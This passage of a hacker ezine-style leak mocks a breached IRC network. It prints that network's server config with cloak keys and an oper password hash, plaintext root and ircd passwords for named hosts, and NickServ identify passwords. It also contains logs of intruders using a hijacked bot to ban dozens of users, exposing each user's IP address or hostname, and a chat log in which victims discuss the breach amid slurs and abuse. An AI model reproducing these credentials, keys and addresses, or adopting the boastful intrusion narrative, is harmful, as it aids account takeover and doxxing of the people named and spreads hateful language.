+█ ban nick { +█ mask "zyk-*"; +█ reason "Nickname not allowed"; +█ }; +█ +█ ban realname { +█ mask "Swat Team"; +█ reason "mIRKFORCE"; +█ }; +█ +█ set { +█ network-name "ProjectInsecurity"; +█ default-server "irc.insecurity.zone"; +█ services-server "services.undernix.net"; +█ stats-server "stats.undernix.net"; +█ help-channel "#help"; +█ hiddenhost-prefix "boats"; +█ snomask-on-oper "+xwipIHWgs"; +█ +█ cloak-keys { +█ "ADXq2XNBW2NQXDP1kd6G2U1q7ph2HG5ZTK0E2wqLa"; +█ "DoF9BXfSkTzKobCQu8vwzWpzZbpm1VquxJpNTvORa"; +█ "hhkOmc3q1ik0sC0bT349zOnnU35xrSK1GEHLzC5Sa"; +█ }; +█ +█ hosts { +█ local "insecurity.zone"; +█ global "insecurity.zone"; +█ coadmin "insecurity.zone"; +█ admin "insecurity.zone"; +█ servicesadmin "insecurity.zone"; +█ netadmin "insecurity.zone"; +█ host-on-oper-up "yes"; +█ }; +█ }; +█ +█ set { +█ kline-address "careless@fuckyou.com"; +█ modes-on-connect "+ixw"; +█ modes-on-oper "+xwipIHWgs"; +█ oper-auto-join "#operators"; +█ options { +█ hide-ulines; +█ show-connect-info; +█ }; +█ maxchannelsperuser 20; +█ restrict-usermodes "s"; +█ oper-only-stats "*"; +█ throttle { +█ connections 7; +█ period 60s; +█ }; +█ anti-flood { +█ nick-flood 5:30; +█ }; +█ }; +█ +█ allow { +█ ip *@*; +█ hostname *@*; +█ class clients; +█ maxperip 9; +█ }; +█ +█ alias { type services; }; +█ alias ChanServ { type services; }; +█ alias OperServ { type services; }; +█ alias HelpServ { type services; }; +█ +█ @ret2libc (MLT): First off, I haven't even implemented MD5 anywhere. +█ Secondly, please show me evidence of collisions being actively abused in the +█ wild. +█ +█ Is true MLT plaintext != MD5. But maybe we checking the hub config next. +█ root@zyzz8:~# ./unr34l-p1v0t superb.underunix.net +█ oper MLT { +█ class clients; +█ from { +█ userhost *@*; +█ }; +█ password "$eIU5EWKz$juoBabw3RQrdYZYzW/7f2A=="{ md5; }; +█ flags +█ { +█ netadmin; +█ global; +█ can_rehash; +█ +█ This looking like MD5 to me. +█ Okay bongrip, is time to get your priv8 root password.. +█ +█ host = ip-41-230-239-173.toronto.ca.northamericancoax.com : username = ins3c +█ ircd : password = gangster4lyf +█ host = 198.15.79.157 : username = root : password = h3ll0p00p6654 +█ +█ root:h3ll0p00p6654 +█ +█ +███████████████████████████████████████████████████████████████████████████████ +███▓▓▓▒▒▒░░░ 0x05 A flaw in MD5 ███ +███████████████████████████████████████████████████████████████████████████████ +█░░ +█░ +█░ We'll let bongrip describe his bot for us. Keep in mind there is a bot on +█ their network that allowing you to change your vhost. +█ +█ bongrip == rebel/defiler/dope/n0de9 (IPT/BlueHell) +█ danK == django +█ +█ do not try to exploit django, u will get glined +█ its all automated +█ it identifies by nick/ident/host +█ +█ !vhost insecurity.zone +█ * vHostserv sets ban on MLT|afk!*@* +█ * You have been kicked from #vhost by vHostserv (Done. You can request a new +█ vhost after 1 seconds from your last one. Banned for 1 seconds) +█ +█ By the way, is still 0day'd, they never figuring it out. Their best guess +█ being we either made a 0day driveby browser exploit or cracked a 63 +█ character m1x3d alphanumeric MD5 hash with symb0ls. +█ +█ Which would take 4,109,550,000,000,000,000,000,000,000,000,000,000,000,000, +█ 000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000, +█ 000,000 years for our cluster of 200 GTX1080's to crack. The heat death of +█ universe would happening first, but skids not thinking that far. +█ +█ * Now talking on #priv8 +█ * Topic for #priv8 is: SuPeR SeCrEt +█ * Topic for #priv8 set by MLT (Sun Jun 4 08:33:14 2017) +█ * danK sets mode +a on #priv8 MLT +█ * danK gives channel operator status to MLT +█ OPER OVERRIDE: danK +█ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv8 +ao +█ MLT MLT +█ .gline dirty +█ Added gline for dirty r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ dirty!dirty@crownemirates.bid (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline fuzion +█ Added gline for fuzion r.i.p +█ .gline fuzi0n +█ Added gline for fuzi0n r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ FuZi0N!FuZi0N@162.248.73.100 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline lola +█ Added gline for lola r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ lola!lola@zyzz10.isla.moe (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ catsik!catsik@zyzz10.isla.moe (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline RMS +█ Added gline for RMS r.i.p +█ (User) exiting : at fsociety.internetz.me: RMS!r1ch4rd@91.92.136.64 +█ (User has been permanently banned from internetz.me +█ (no reason)) +█ .gline Nux +█ Added gline for Nux r.i.p +█ (User) exiting : at fsociety.internetz.me: Nux!nux@skidstain.com +█ (User has been permanently banned from internetz.me +█ (no reason)) +█ .gline syn4pse +█ Added gline for syn4pse r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ loeken!loeken@u.internetz.me (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ syn4pse!syn@u.internetz.me (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ [internetz|me|u]!ime@u.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ syn4pse-!syninsec@u.internetz.me (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline sxcurity +█ Added gline for sxcurity r.i.p +█ (User) exiting : at aussie.insecurity.zone: sxcurity!sxC@nullptr.cz +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: bongrip_!a@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: dab!2POTENT@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: Zodiac!Zodiac@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: bongrip-!a@nullptr.cz +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline sniger +█ Added gline for sniger r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ sniger!sniger@45.32.162.220 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ danC3!danC2@45.32.162.220 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline tables +█ Added gline for tables r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ tables!tables@5.79.86.15 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Bansh +█ (User) connecting : at fsociety.internetz.me: loeken +█ (loeken@p5DDC2C31.dip0.t-ipconnect.de) +█ Added gline for Bansh r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Bansh!r00t@tor.thd.ninja (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: tables +█ (tables@marylou.nos-oignons.net) +█ NickServ: tables!tables@marylou.nos-oignons.net identified for nick +█ tables. +█ .gline Derp +█ Added gline for Derp r.i.p +█ (User) exiting : at aussie.insecurity.zone: Derp!Derp@194.88.143.66 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline vein +█ Added gline for vein r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ vein!Amaterasu@ec2-52-42-196-254.us-west-2.compute.amazonaws.com +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline dab +█ Added gline for dab r.i.p +█ .gline FSB +█ Sorry komrade +█ Added gline for FSB r.i.p +█ (User) connecting : at aussie.insecurity.zone: Derp +█ (Derp@tor00.telenet.unc.edu) +█ (User) exiting : at aussie.insecurity.zone: FSB!efSB@95.215.47.208 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline Alyssa +█ Added gline for Alyssa r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ skooch!sid3163@brockwell.irccloud.com (User has been permanently banned +█ frominternetz.me (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ Alyssa!sid226984@brockwell.irccloud.com (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ .gline peanuter +█ Added gline for peanuter r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ peanuter!peanuter@80.82.77.240 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline ma0u +█ Added gline for ma0u r.i.p +█ (User) exiting : at fsociety.internetz.me: ma0u!fr0zn@45.63.41.227 +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline anniesbbs +█ Added gline for anniesbbs r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ anniesbbs!anniesbbs@185.21.216.195 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline dyingbreed +█ GLOBAL OPS: -- from OperServ: loeken is now an IRC operator. +█ Added gline for dyingbreed r.i.p +█ (User) connecting : at aussie.insecurity.zone: dirty +█ (dirty@tor00.telenet.unc.edu) +█ (User) exiting : dyingbreed (x@0s3x.internetz.me) [User has been +█ permanently banned from HackTimes (no reason)] +█ (User) exiting : at fsociety.internetz.me: +█ Southern_B|tch!NoneYa@0s3x.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline loeken +█ Added gline for loeken r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ loeken!loeken@p5DDC2C31.dip0.t-ipconnect.de (User has been permanently +█ banned from internetz.me (no reason)) +█ .gline dirty +█ Added gline for dirty r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Derp!Derp@tor00.telenet.unc.edu (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ dirty!dirty@tor00.telenet.unc.edu (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline ShadowBrokers +█ Added gline for ShadowBrokers r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ ShadowBrokers!root@afainatl.com (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline trentmicro +█ Added gline for trentmicro r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ trentmicro!kayla@204.44.91.24 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) connecting : at fsociety.internetz.me: Bansh +█ (r00t@163.172.217.50) +█ (User) exiting : at fsociety.internetz.me: +█ Bansh!r00t@163.172.217.50 (User is permanently banned (Tor exit server +█ detected. See www.sectoor.de/tor.php?ip=163.172.217.50)) +█ .gline xamfp +█ Added gline for xamfp r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ xamfp!xamfp@ec2-52-15-197-60.us-east-2.compute.amazonaws.com (User +█ has been permanently banned from internetz.me (no reason)) +█ .gline skooch +█ Added gline for skooch r.i.p +█ .gline cSmith +█ Added gline for cSmith r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ cSmith!csmith@cynical.us (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline deeboi +█ Added gline for deeboi r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ deeboi!deeboi@144.217.215.125 (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline Darkness +█ Added gline for Darkness r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Darkness!Darkness@185.153.198.117 (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline nill +█ Added gline for nill r.i.p +█ (User) exiting : at fsociety.internetz.me: nill!n@198.251.80.206 +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline mr_vile +█ Added gline for mr_vile r.i.p +█ (User) exiting : at fsociety.internetz.me: mr_vile!no@i.dontexi.st +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline kurobeats +█ Added gline for kurobeats r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ kurobeats!Got@CPE-121-215-138-162.lnse1.wel.bigpond.net.au (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline Derp +█ Added gline for Derp r.i.p +█ .gline FlappyCuck +█ Added gline for FlappyCuck r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ FlappyCuck!frinks@192.240.127.83 (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ smurgle!frinks@192.240.127.83 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline scope +█ Added gline for scope r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ scope!deploy@ip180.ip-193-70-95.eu (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Nux_ +█ Added gline for Nux_ r.i.p +█ (User) exiting : at fsociety.internetz.me: Nux_!nux@45.76.37.141 +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline v1tal +█ Added gline for v1tal r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ v1tal!buddy@bitcoinshell.mooo.com (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline Teridax +█ Added gline for Teridax r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Teridax!Teridax@teridax.com (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline noproto +█ Added gline for noproto r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ noproto!noproto@104.236.220.65 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline w0ne +█ Added gline for w0ne r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ w0ne!w0ne@ec2-35-163-190-224.us-west-2.compute.amazonaws.com (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline AHyGjl76Jhf53 +█ Added gline for AHyGjl76Jhf53 r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ AHyGjl76Jhf53!AHyGjl76Jh@141.132.250.13 (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ .gline catsik +█ Added gline for catsik r.i.p +█ .gline Glaive +█ Added gline for Glaive r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Glaive!Glaive@c-24-15-237-161.hsd1.il.comcast.net (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline didi_ +█ Added gline for didi_ r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ didi_!anona@82.192.95.120 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline tatootian +█ Added gline for tatootian r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ tatootian!p@ns501141.ip-192-99-5.net (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline eight_bytes +█ Added gline for eight_bytes r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ eight_bytes!sid141403@192.184.10.9 (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline psycho +█ Added gline for psycho r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ psycho!psycho@hammetjus.nl (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline icyphox +█ Added gline for icyphox r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ icyphox!icyphox@45.32.112.198 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Salam +█ Added gline for Salam r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Salam!ric0@23.239.80.28 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ n0rdi!ric0@23.239.80.28 (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) connecting : at fsociety.internetz.me: synk +█ (loeken@eu.fr1.cdn.internetz.me) +█ .gline rek +█ Added gline for rek r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ rek!r_e_k@46.102.152.118 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline pop +█ Added gline for pop r.i.p +█ .gline synk +█ (User) exiting : at aussie.insecurity.zone: +█ pop!lol@blackhat.cat (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ Added gline for synk r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ synk!loeken@eu.fr1.cdn.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline syn4pse- +█ Added gline for syn4pse- r.i.p +█ (User) connecting : at aussie.insecurity.zone: NS-DonaldL +█ (NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com) +█ .gline smurgle +█ Added gline for smurgle r.i.p +█ .gline NS-DonaldL +█ Added gline for NS-DonaldL r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ NS-DonaldL!NS-DonaldL@ip-90-2-52-196.nyc.us.northamericancoax.com +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline rqu1_ +█ Added gline for rqu1_ r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1!r@216.218.222.12 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1_!r@216.218.222.12 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Zodiac +█ (User) connecting : at aussie.insecurity.zone: rqu1 +█ (r@163.172.212.115) +█ Added gline for Zodiac r.i.p +█ (User) connecting : at aussie.insecurity.zone: rqu1_ +█ (r@163.172.212.115) +█ .gline rqu1_ +█ Added gline for rqu1_ r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1!r@163.172.212.115 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) exiting : at aussie.insecurity.zone: +█ rqu1_!r@163.172.212.115 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Southern_B|tch +█ Added gline for Southern_B|tch r.i.p +█ .gline BrownDowntown +█ Added gline for BrownDowntown r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ BrownDowntown!bdt@212.92.104.143 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline Conflict +█ Added gline for Conflict r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ Conflict!Conflict@185.10.68.229 (User has been permanently banned from +█ internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: +█ hipphopp!n@185.10.68.229 (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline sipa +█ Added gline for sipa r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ sipa!sipa@dsl-trebng11-54f90b-135.dhcp.inet.fi (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline thom +█ Added gline for thom r.i.p +█ (User) exiting : at fsociety.internetz.me: thom!xD@haxx.pw (User +█ has been permanently banned from internetz.me (no reason)) +█ (User) exiting : at fsociety.internetz.me: lilwiz!lilwiz@haxx.pw +█ (User has been permanently banned from internetz.me (no reason)) +█ .gline krazed +█ Added gline for krazed r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ krazed!admin@bigballs.club (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline lola +█ Added gline for lola r.i.p +█ .gline ald0g +█ Added gline for ald0g r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ ald0g!root@prawksi.relay.coldhak.com (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline installgen2 +█ Added gline for installgen2 r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ installgen2!installgen@gen2.space (User has been permanently banned from +█ internetz.me (no reason)) +█ .gline pezzer +█ Added gline for pezzer r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ pezzer!pezzer@144.202.228.211 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: ald0g +█ (root@185.170.41.8) +█ .gline ald0g +█ Added gline for ald0g r.i.p +█ (User) exiting : at aussie.insecurity.zone: ald0g!root@185.170.41.8 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline gibbz +█ Added gline for gibbz r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ gibbz!gibby@69.150.188.35.bc.googleusercontent.com (User has been +█ permanently banned from internetz.me (no reason)) +█ .gline Glaive +█ (User) connecting : at fsociety.internetz.me: loeken +█ (loeken@eu.fr2.cdn.internetz.me) +█ Added gline for Glaive r.i.p +█ .gline loeken +█ Added gline for loeken r.i.p +█ (User) exiting : at fsociety.internetz.me: +█ loeken!loeken@eu.fr2.cdn.internetz.me (User has been permanently banned +█ from internetz.me (no reason)) +█ .gline sxcurity +█ Added gline for sxcurity r.i.p +█ .gline Jaq +█ Added gline for Jaq r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Jaq!No@pD952AAED.dip0.t-ipconnect.de (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline tables +█ Added gline for tables r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ tables!tables@marylou.nos-oignons.net (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ .gline c12 +█ Added gline for c12 r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ c12!c12@politkovskaja.torservers.net (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline herpez +█ Added gline for herpez r.i.p +█ (User) connecting : at aussie.insecurity.zone: notroot +█ (toor@45.63.16.220) +█ (User) connecting : at aussie.insecurity.zone: c12 +█ (c12@91.223.82.156) +█ .gline Withers +█ Added gline for Withers r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ Withers!YUL@46.101.54.55 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .gline c12 +█ Added gline for c12 r.i.p +█ (User) exiting : at aussie.insecurity.zone: c12!c12@91.223.82.156 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ .gline integrity +█ Added gline for integrity r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ integrity!hello@gay-nigger-hitler.club (User has been permanently banned +█ from ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: ma0u +█ (umom@69.42.217.130) +█ .gline ma0u +█ Added gline for ma0u r.i.p +█ (User) exiting : at aussie.insecurity.zone: ma0u!umom@69.42.217.130 +█ (User has been permanently banned from ProjectInsecurity (no reason)) +█ (User) connecting : at aussie.insecurity.zone: tables +█ (tables@93.174.93.133) +█ NickServ: tables!tables@93.174.93.133 identified for nick tables. +█ .gline tables +█ Added gline for tables r.i.p +█ (User) exiting : at aussie.insecurity.zone: +█ tables!tables@93.174.93.133 (User has been permanently banned from +█ ProjectInsecurity (no reason)) +█ .join #priv9 +█ Joining #priv9. +█ OPER OVERRIDE: danK +█ (POTENT@ec2-34-210-28-112.us-west-2.compute.amazonaws.com) MODE #priv9 +█ +ao MLT MLT +█ ;) +█ * danK has quit (aussie.insecurity.zone superb.undernix.net) +█ * bongrip has quit (aussie.insecurity.zone superb.undernix.net) +█ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ +█ * You are now known as NickServ +█ identify ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/.,xoxs77h2551`{_ +█ jx +█ ->MLT<- Password accepted, you are now recognized. +█ IDENTIFY fuckyehbr0 +█ ->bongrip-<- Password accepted, you are now recognized. +█ ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀ +█ хихихи +█ +█ how is it even happening tho?? lol +█ like this all began with defilers bot +█ i understand how that happened +█ the first time +█ but +█ i changed my pass +█ for nickserv +█ did 'MLT' ask you or defiler for a new oper pass in the past few days? +█ ffs just use a fuckin bnc +█ and be done with it +█ yeah but how the fuck do they have my ns pass +█ and get of that faggot webthing +█ lol are none of the boxes pwned +█ I'm pretty sure one of the boxes must be pwned +█ Just going to drop this here.. +█ identify MLT ISFATGtrajgvLix4b3hzNzdoMjU1MWB7X2p4!!@Lkkj8/. +█ ,xoxs77h2551`{_jx +█ ->MLT<- Password accepted, you are now recognized. +█ and its not lola's he wioped everything +█ rofl yep +█ -!- NickServ [NickServ@privacy.internetz.me-F6EB07AA.east.us.northamericanco +█ ax.com] has quit [User has been permanently banned from internetz.me (...)] +█ wow +█ WTF +█ so um +█ yours or defilers box == pwned +█ I'm guessing +█ lola did a full wipe on all of his shit +█ and i don't even know if its re-linked +█ Can someone pls pm me their jid? So i dont have to bother if things +█ get even worse +█ if anyone comes on here as me just tell them to post on @insecurity +█ but clearly one of the boxes is pwned, lol +█ post on it now +█ just get a bnc +█ keep the bnc online +█ ok sec +█ and dont use that fuckin webchat +█ doesn't matter +█ if they have all ns passes.. +█ waiting for your tweet :P +█ if one of ur boxes is pwned then what difference does that make +█ tweeted +█ tweet "FuZi0N is gawd" +█ i just tweeted 'h' +█ I'll most likely change it +█ https://twitter.com/insecurity?lang=en +█ ahh +█ yes +█ lang=en +█ someone has one of the boxes hooked and i don't think it can be lola's +█ (he wiped everything because defiler asked me to) +█ doxed bro +█ ooo sheiiit +█ hmm +█ .a +█ mgay +█ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre +█ sidential.com] has joined #insecurity +█ So this happens if you stuff all hackers into one irc +█ i need assistance, how do i get a CVE? +█ Look at exploit-db +█ -!- like_our_danK_0day [NickServ@privacy.internetz.me-E8E7395.fr.amsterdamre +█ sidential.com] has quit [Killed (MLT (kys obese antifa furry retard lmfao))] +█ yeah syn4pse- +█ services are owned +█ it would seem.. +█ -!- ChanServ [services@undernix.net] has joined #insecurity +█ -!- mode/#insecurity [+ao ChanServ ChanServ] by ChanServ +█ -!- mode/#insecurity [+rQ] by ChanServ +█ -!- ChanServ changed the topic of #insecurity to: .ProjectInsecurity || Gene +█ ral tech-talk (keep it clean in here) || https://insecurity.zone/ || To enqu +█ ire about joining our core team, then /query MLT || Join #barstool for chats +█ on fleek. +█ so my use of client wont rly make much of a difference if they got all +█ ur ns passes anyway lol +█ Can we unsafe login now? +█ MLT +█ u got rekt +█ m8 +█ ur pw to ur login +█ <&FuZi0N> this is the insecurity zone guys +█ At least he has choosen a safe password +█ password1 ? +█ its not robbie +█ bongrip-: my pw was 60+ chars +█ (22:53:36) &MLT: .gline tables +█ (22:53:36) danK: Added gline for tables r.i.p +█ (22:53:36) danK: (User) exiting : at aussie.insecurity.zone: tabl +█ es!tables@ (User has been permanently banned from ProjectInsecurity (no reas +█ on)) +█ (22:55:23) &MLT: .sajoin +█ (22:55:25) &MLT: .join +█ (22:55:25) danK: Improper syntax. [Ex: !j <#chan>] +█ (22:55:30) &MLT: .join #priv9 +█ (22:55:30) danK: Joining #priv9. +█ (22:55:33) danK: OPER OVERRIDE: danK (POTENT@) MODE #priv9 +ao ML +█ T MLT +█ (22:55:42) &MLT: ;) +█ and used symbols etc +█ ya +█ someone got ur +█ pw +█ then +█ nothing is hacked +█ services == owned +█ no +█ services arent owned +█ so they just +█ they authed under you +█ magicked a 60+ char pw that ive never used for anything else +█ just you lel +█ they opered on you +█ outta nowhere? +█ they cracked hash bro +█ the md5 +█ idk whats going on man +█ idk how they got u +█ so how'd they get the d5 +█ but they got u +█ md5** +█ to begin with <- Wait. I thought you didn't use MD5? +█ i dont think they ever got it tbh cause noboxes are compromised +█ on my end +█ they simply identified as you +█ and glined with dank +█ ok so they didnt get oper +█ they didnt oper up +█ i changed that pass +█ today +█ i set that pw today +█ yea well +█ and somehow they have the new one +█ someone got ur ident pass +█ that's 60+ chars +█ cause u /msg'd nickserv +█ how does that work lol +█ on day +█ one day +█ time to reinstall winblows :p +█ lmao +█ Lol +█ did you click on any fancy links lately :p +█ musta been when services were gone +█ someone /nicked nickserv +█ got ur pass +█ ya probably, i am running windows lmao +█ He msgd an user +█ u may never have changed it +█ but +█ someone definitely got ur pw +█ i changed it todaya +█ this morning +█ <&FuZi0N> FYI never do /msg nickserv use /nickserv instead +█ because someone was on my acc yesterday +█ then they got my new pass +█ ya i use //ns +█ i use the alias +█ given +█ ya i should have did //ns lol +█ rookie mistake +█ tbh +█ Lol +█ <&FuZi0N> MLT ain't no rookie +█ <&FuZi0N> he's a phenom +█ Lol +█ hrm +█ fucking +█ syn4pse- deleted my oper lol +█ cause dank was on it +█ and someone was going ham on ur account +█ <&FuZi0N> yeah +█ through your bot +█ yea but +█ <&FuZi0N> seperate dank and your olines +█ they identified +█ to mlt +█ congrats +█ <&FuZi0N> so we can isolate the issue next time +█ once again team effort +█ lol +█ i mean lets look at the beginning entrance +█ are u sure they haven't got another bug in dank?? +█ nope +█ positive +█ 100% +█ are u sanitizing everything now? or did u just sanitize UD? +█ ah ok +█ i loked at #noc +█ they made dank join #priv9 +█ and glined more ppl +█ <&FuZi0N> hahah +█ Loooooooo8888888 +█ !user list +█ fuck +█ so to sum it up +█ <&FuZi0N> but when i did .pwn mlt how were they still able to access dank? +█ im the only oper who didnt fuck up compltely? +█ lmao +█ * syn4pse feels secure +█ lol +█ lol +█ i don't see what i can be doing wrong (other than running windows) +█ to be fair the sendraw wasnt shit +█ <&FuZi0N> dirty and i were the IDS +█ but lemme fix this +█ inb4 they hit me w/ some browser 0day +█ lol +█ <&FuZi0N> then syn4pse- did the hacking +█ because i have no idea +█ how they could repeatedly obtain my ns pass +█ if services weren't pwned +█ they didnt have any real access +█ can only mean I'm pwned @ client-side i guess +█ MLT, thats why you dont fuckin open unknown links +█ theres sandboxes +█ well, i dont +█ do that +█ disposable vms +█ so like +█ etc for that sorta thing +█ idk how this could have happened +█ i htink they snagged ur pw +█ the last time that shit happened +█ <&FuZi0N> bongrip: .pwn cmd deletes access from dank right? +█ these are the same people +█ taht did it last time +█ MLT +█ theres no other way +█ they got ur pw +█ unless u truly are owned 